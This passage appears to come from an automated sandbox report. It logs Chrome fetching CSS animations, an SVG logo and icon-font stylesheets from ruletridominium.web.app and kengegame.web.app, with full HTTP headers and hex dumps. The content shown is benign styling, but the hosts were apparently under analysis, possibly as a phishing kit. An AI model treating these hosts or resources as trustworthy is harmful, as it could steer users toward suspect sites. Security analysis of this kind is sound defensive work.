                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 20 73 63 61 6c 65 33 64 28 31 2c 31 2c 31 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 61 6e 69 6d 4a 65 6c 6c 79 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 33 2c 30 2c 30 2c 30 2c 30 2c 2e 33 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 33 2c 30 2c 30 2c 30 2c 30 2c 2e 33 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 7d 34 2e 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 36 30 36 2c 30 2c 30 2c 30 2c 30 2c 2e 36 34 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30
                                                                                                                                                                                                                                                                                Data Ascii: transform:translate3d(0,0,0) scale3d(1,1,1)}}@-webkit-keyframes animJelly{0%{-webkit-transform:matrix3d(.3,0,0,0,0,.3,0,0,0,0,1,0,0,0,0,1);transform:matrix3d(.3,0,0,0,0,.3,0,0,0,0,1,0,0,0,0,1)}4.5%{-webkit-transform:matrix3d(.606,0,0,0,0,.64,0,0,0,0,1,0,0
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 2c 31 29 7d 33 34 2e 36 33 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 30 31 38 2c 30 2c 30 2c 30 2c 30 2c 2e 39 39 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 30 31 38 2c 30 2c 30 2c 30 2c 30 2c 2e 39 39 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 7d 33 36 2e 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 30 31 33 2c 30 2c 30 2c 30 2c 30 2c 2e 39 39 32 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 30 31 33 2c 30 2c 30 2c 30 2c 30 2c 2e 39 39 32 2c 30 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                Data Ascii: ,1)}34.63%{-webkit-transform:matrix3d(1.018,0,0,0,0,.996,0,0,0,0,1,0,0,0,0,1);transform:matrix3d(1.018,0,0,0,0,.996,0,0,0,0,1,0,0,0,0,1)}36.24%{-webkit-transform:matrix3d(1.013,0,0,0,0,.992,0,0,0,0,1,0,0,0,0,1);transform:matrix3d(1.013,0,0,0,0,.992,0,0,0,
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 39 31 37 2c 30 2c 30 2c 30 2c 30 2c 2e 39 39 37 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 7d 31 33 2e 35 31 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 39 38 34 2c 30 2c 30 2c 30 2c 30 2c 31 2e 30 36 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 39 38 34 2c 30 2c 30 2c 30 2c 30 2c 31 2e 30 36 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 7d 31 36 2e 35 32 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 30 33 33 2c 30 2c 30
                                                                                                                                                                                                                                                                                Data Ascii: 0,0,0,0,1,0,0,0,0,1);transform:matrix3d(.917,0,0,0,0,.997,0,0,0,0,1,0,0,0,0,1)}13.51%{-webkit-transform:matrix3d(.984,0,0,0,0,1.061,0,0,0,0,1,0,0,0,0,1);transform:matrix3d(.984,0,0,0,0,1.061,0,0,0,0,1,0,0,0,0,1)}16.52%{-webkit-transform:matrix3d(1.033,0,0
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 30 2c 30 2c 30 2c 30 2c 31 2e 30 30 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 7d 31 30 30 25 2c 37 39 2e 30 38 25 2c 38 34 2e 36 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 61 6e 69 6d 4a 65 6c 6c 79 54 68 72 65 65 51 75 61 72 74 65 72 53 63 61 6c 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 32 2c 30 2c 30 2c 30 2c 30 2c 2e
                                                                                                                                                                                                                                                                                Data Ascii: 0,0,0,0,1.001,0,0,0,0,1,0,0,0,0,1)}100%,79.08%,84.68%{-webkit-transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1);transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1)}}@-webkit-keyframes animJellyThreeQuarterScale{0%{-webkit-transform:matrix3d(.2,0,0,0,0,.
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 37 2e 38 33 36 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 37 35 39 2c 30 2c 30 2c 30 2c 30 2c 2e 38 30 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 37 2e 38 33 36 2c 30 2c 31 29 7d 39 2e 36 39 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 37 36 2c 30 2c 30 2c 30 2c 30 2c 2e 38 30 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 38 2e 31 32 38 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 37 36 2c 30 2c 30 2c 30 2c 30 2c 2e 38 30 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 38 2e 31 32 38 2c 30 2c 31 29 7d 31 32 2e 38 39 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74
                                                                                                                                                                                                                                                                                Data Ascii: 0,0,1,0,0,-67.836,0,1);transform:matrix3d(.759,0,0,0,0,.806,0,0,0,0,1,0,0,-67.836,0,1)}9.69%{-webkit-transform:matrix3d(.76,0,0,0,0,.806,0,0,0,0,1,0,0,-68.128,0,1);transform:matrix3d(.76,0,0,0,0,.806,0,0,0,0,1,0,0,-68.128,0,1)}12.89%{-webkit-transform:mat
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 37 2e 33 39 31 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 37 2e 33 39 31 2c 30 2c 31 29 7d 33 39 2e 34 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 37 2e 30 38 39 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 2e 37 35 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 2d 36 37
                                                                                                                                                                                                                                                                                Data Ascii: t-transform:matrix3d(.75,0,0,0,0,.75,0,0,0,0,1,0,0,-67.391,0,1);transform:matrix3d(.75,0,0,0,0,.75,0,0,0,0,1,0,0,-67.391,0,1)}39.44%{-webkit-transform:matrix3d(.75,0,0,0,0,.75,0,0,0,0,1,0,0,-67.089,0,1);transform:matrix3d(.75,0,0,0,0,.75,0,0,0,0,1,0,0,-67


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                18192.168.2.649741199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC583OUTGET /880ae5ba69e733fe8f2f738fae4a4697.svg HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC595INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 4985
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                Etag: "c83c8c5f347b921b86cc008cbf2cdcbb6ee2495289840b8efc76bcacd9fd17f8"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740061-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 2
                                                                                                                                                                                                                                                                                X-Timer: S1728225714.431034,VS0,VE0
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 36 36 22 20 68 65 69 67 68 74 3d 22 31 31 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 37 2e 39 34 35 20 34 39 2e 33 39 35 63 2d 31 2e 39 33 38 2e 38 39 33 2d 35 2e 35 34 36 20 31 2e 36 30 35 2d 39 2e 36 34 20 31 2e 36 30 35 43 37 2e 31 32 34 20 35 31 20 30 20 34 34 2e 31 37 34 20 30 20 33 33 2e 33 33 36 20 30 20 32 33 2e 32 34 36 20 36 2e 39 32 32 20 31 35 20 31 39 2e 37 38 38 20 31 35 63 32 2e 38 34 37 20 30 20 35 2e 39 36 35 2e 35 31 33 20 38 2e 32 31 32 20 31 2e 33 36 6c 2d 31 2e 36 37 36 20 37 2e 39 37 63 2d
                                                                                                                                                                                                                                                                                Data Ascii: <svg width="266" height="111" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><path d="M27.945 49.395c-1.938.893-5.546 1.605-9.64 1.605C7.124 51 0 44.174 0 33.336 0 23.246 6.922 15 19.788 15c2.847 0 5.965.513 8.212 1.36l-1.676 7.97c-
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 2e 35 32 36 20 32 2e 32 32 32 20 39 2e 32 36 20 35 2e 35 38 38 20 39 2e 33 30 33 20 31 30 2e 36 31 35 43 31 34 34 20 34 36 2e 32 35 37 20 31 33 38 2e 39 39 33 20 35 31 20 31 32 39 2e 31 33 37 20 35 31 63 2d 34 2e 34 38 34 20 30 2d 38 2e 35 31 34 2d 31 2e 30 31 38 2d 31 31 2e 31 33 37 2d 32 2e 34 32 36 6c 31 2e 39 33 37 2d 37 2e 36 35 36 7a 4d 31 36 32 2e 38 36 38 20 36 76 39 2e 38 32 32 48 31 37 37 76 37 2e 38 39 38 68 2d 31 34 2e 31 33 32 76 31 32 2e 34 37 37 63 30 20 34 2e 31 35 33 20 31 2e 30 31 39 20 36 2e 30 36 38 20 34 2e 31 37 33 20 36 2e 30 36 38 20 31 2e 33 36 35 20 30 20 32 2e 34 31 37 2d 2e 31 34 36 20 33 2e 31 34 34 2d 2e 33 32 6c 2e 30 38 37 20 38 2e 31 33 34 63 2d 31 2e 33 36 37 2e 35 2d 33 2e 38 39 32 2e 39 32 31 2d 36 2e 38 35 34 2e 39 32
                                                                                                                                                                                                                                                                                Data Ascii: .526 2.222 9.26 5.588 9.303 10.615C144 46.257 138.993 51 129.137 51c-4.484 0-8.514-1.018-11.137-2.426l1.937-7.656zM162.868 6v9.822H177v7.898h-14.132v12.477c0 4.153 1.019 6.068 4.173 6.068 1.365 0 2.417-.146 3.144-.32l.087 8.134c-1.367.5-3.892.921-6.854.92
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 20 31 33 2e 35 38 32 68 2d 32 2e 37 37 32 6c 2d 34 2e 36 32 39 2d 31 33 2e 33 33 34 63 2d 31 2e 33 35 32 2d 33 2e 39 35 36 2d 32 2e 34 35 36 2d 37 2e 35 34 38 2d 33 2e 32 35 2d 31 30 2e 38 36 33 68 2d 2e 31 30 31 63 2d 2e 30 39 39 20 33 2e 34 38 39 2d 2e 32 38 32 20 38 2e 31 35 2d 2e 35 35 36 20 31 32 2e 33 35 32 4c 31 32 39 2e 34 38 34 20 39 30 48 31 32 36 6c 31 2e 39 37 36 2d 32 38 68 34 2e 36 38 37 6c 34 2e 38 33 39 20 31 33 2e 35 35 33 63 31 2e 31 37 20 33 2e 34 32 38 20 32 2e 31 32 33 20 36 2e 35 31 32 20 32 2e 38 36 20 39 2e 34 33 34 68 2e 31 31 31 63 2e 37 34 36 2d 32 2e 38 33 36 20 31 2e 37 33 39 2d 35 2e 39 32 33 20 33 2e 30 30 36 2d 39 2e 34 33 4c 31 34 38 2e 35 34 37 20 36 32 68 34 2e 36 39 33 4c 31 35 35 20 39 30 68 2d 33 2e 36 30 37 6c 2d 2e
                                                                                                                                                                                                                                                                                Data Ascii: 13.582h-2.772l-4.629-13.334c-1.352-3.956-2.456-7.548-3.25-10.863h-.101c-.099 3.489-.282 8.15-.556 12.352L129.484 90H126l1.976-28h4.687l4.839 13.553c1.17 3.428 2.123 6.512 2.86 9.434h.111c.746-2.836 1.739-5.923 3.006-9.43L148.547 62h4.693L155 90h-3.607l-.
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC851INData Raw: 2e 34 37 39 2d 33 36 2e 37 35 32 2d 35 2e 35 30 34 7a 4d 31 31 39 2e 39 30 34 20 31 31 31 63 2d 31 2e 38 36 37 2d 34 2e 39 33 37 2d 34 2e 36 39 38 2d 39 2e 33 30 35 2d 37 2e 39 31 2d 31 33 2e 34 33 32 2d 32 2e 34 37 37 2d 33 2e 31 38 35 2d 35 2e 33 32 37 2d 35 2e 39 39 35 2d 38 2e 36 37 37 2d 38 2e 32 37 36 2d 2e 36 35 37 2d 2e 34 34 39 2d 31 2e 31 35 32 2d 2e 35 31 33 2d 31 2e 38 34 35 2d 2e 31 30 35 2d 38 2e 36 31 35 20 35 2e 30 38 38 2d 31 37 2e 36 31 20 39 2e 33 37 33 2d 32 37 2e 30 31 20 31 32 2e 37 38 36 2d 36 2e 37 38 37 20 32 2e 34 36 35 2d 31 33 2e 37 32 34 20 34 2e 33 36 34 2d 32 30 2e 39 31 35 20 35 2e 31 34 32 2d 35 2e 37 39 38 2e 36 32 37 2d 31 31 2e 35 36 37 2e 31 33 36 2d 31 37 2e 32 37 32 2d 2e 39 36 35 2d 31 33 2e 36 35 33 2d 32 2e 36 33
                                                                                                                                                                                                                                                                                Data Ascii: .479-36.752-5.504zM119.904 111c-1.867-4.937-4.698-9.305-7.91-13.432-2.477-3.185-5.327-5.995-8.677-8.276-.657-.449-1.152-.513-1.845-.105-8.615 5.088-17.61 9.373-27.01 12.786-6.787 2.465-13.724 4.364-20.915 5.142-5.798.627-11.567.136-17.272-.965-13.653-2.63


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                19192.168.2.649743199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC508OUTGET /kit-style.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: kengegame.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC604INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 694
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                                                                Etag: "17fe00f407834ebf578fb04bef5f423c027fa6e9216f761665621d00b2c72f7c"
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 03 Aug 2022 23:26:44 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890034-NYC
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225714.463672,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC694INData Raw: 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 63 6f 72 65 2d 6e 6f 74 69 66 79 22 3e 2e 6e 6f 74 69 66 79 6a 73 2d 63 6f 72 6e 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 35 30 3b 0a 7d 0a 0a 2e 6e 6f 74 69 66 79 6a 73 2d 63 6f 72 6e 65 72 20 2e 6e 6f 74 69 66 79 6a 73 2d 77 72 61 70 70 65 72 2c 0a 2e 6e 6f 74 69 66 79 6a 73 2d 63 6f 72 6e 65 72 20 2e 6e 6f 74 69 66 79 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: type="text/css" id="core-notify">.notifyjs-corner { position: fixed; margin: 5px; z-index: 1050;}.notifyjs-corner .notifyjs-wrapper,.notifyjs-corner .notifyjs-container { position: relative; display: block; height: inherit;


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                20192.168.2.649744199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC515OUTGET /core-awesome.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: kengegame.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 363468
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                                                                Etag: "37e054ba947f5730d65874c385473048c2e071c9ab7d58cf1542007ba5d002ca"
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 03 Aug 2022 23:26:44 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740057-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225714.464490,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 69 63 6f 6d 6f 6f 6e 27 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 72 75 6c 65 74 72 69 64 6f 6d 69 6e 69 75 6d 2e 77 65 62 2e 61 70 70 2f 30 66 33 33 39 63 32 65 32 36 61 64 30 63 39 31 32 35 33 30 36 34 65 64 37 37 39 36 63 34 30 64 39 38 30 31 65 34 30 65 2e 74 74 66 22 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 2c 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 72 75 6c 65 74 72 69 64 6f 6d 69 6e 69 75 6d 2e 77 65 62 2e 61 70 70 2f 35 61 64 35 35 66 38 64 37 36 38 66 30 64 38 62 64 35 33 32 38 64 38 38 61 39 34 31 35 37 39 30 30 34 36 37 31 34 66 63 22 29 20 66 6f 72 6d 61 74 28 22 77
                                                                                                                                                                                                                                                                                Data Ascii: type="text/css">@font-face { font-family: 'icomoon'; src: url("https://ruletridominium.web.app/0f339c2e26ad0c91253064ed7796c40d9801e40e.ttf") format("truetype"), url("https://ruletridominium.web.app/5ad55f8d768f0d8bd5328d88a9415790046714fc") format("w
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 67 32 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 45 39 30 42 22 3b 20 7d 0a 0a 2e 69 63 6f 6e 2d 6d 6f 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 45 39 30 45 22 3b 20 7d 0a 0a 2e 69 63 6f 6e 2d 68 61 70 70 79 5f 66 61 63 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 45 39 31 30 22 3b 20 7d 0a 0a 2e 69 63 6f 6e 2d 68 6f 75 73 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 45 39 31 32 22 3b 20 7d 0a 0a 2e 69 63 6f 6e 2d 63 61 72 65 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 45 39 31 33 22 3b 20 7d 0a 0a 2e 69 63 6f 6e 2d 68 65 61 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 45 39 31 34 22
                                                                                                                                                                                                                                                                                Data Ascii: g2:before { content: "\E90B"; }.icon-more:before { content: "\E90E"; }.icon-happy_face:before { content: "\E910"; }.icon-house:before { content: "\E912"; }.icon-career:before { content: "\E913"; }.icon-heart:before { content: "\E914"
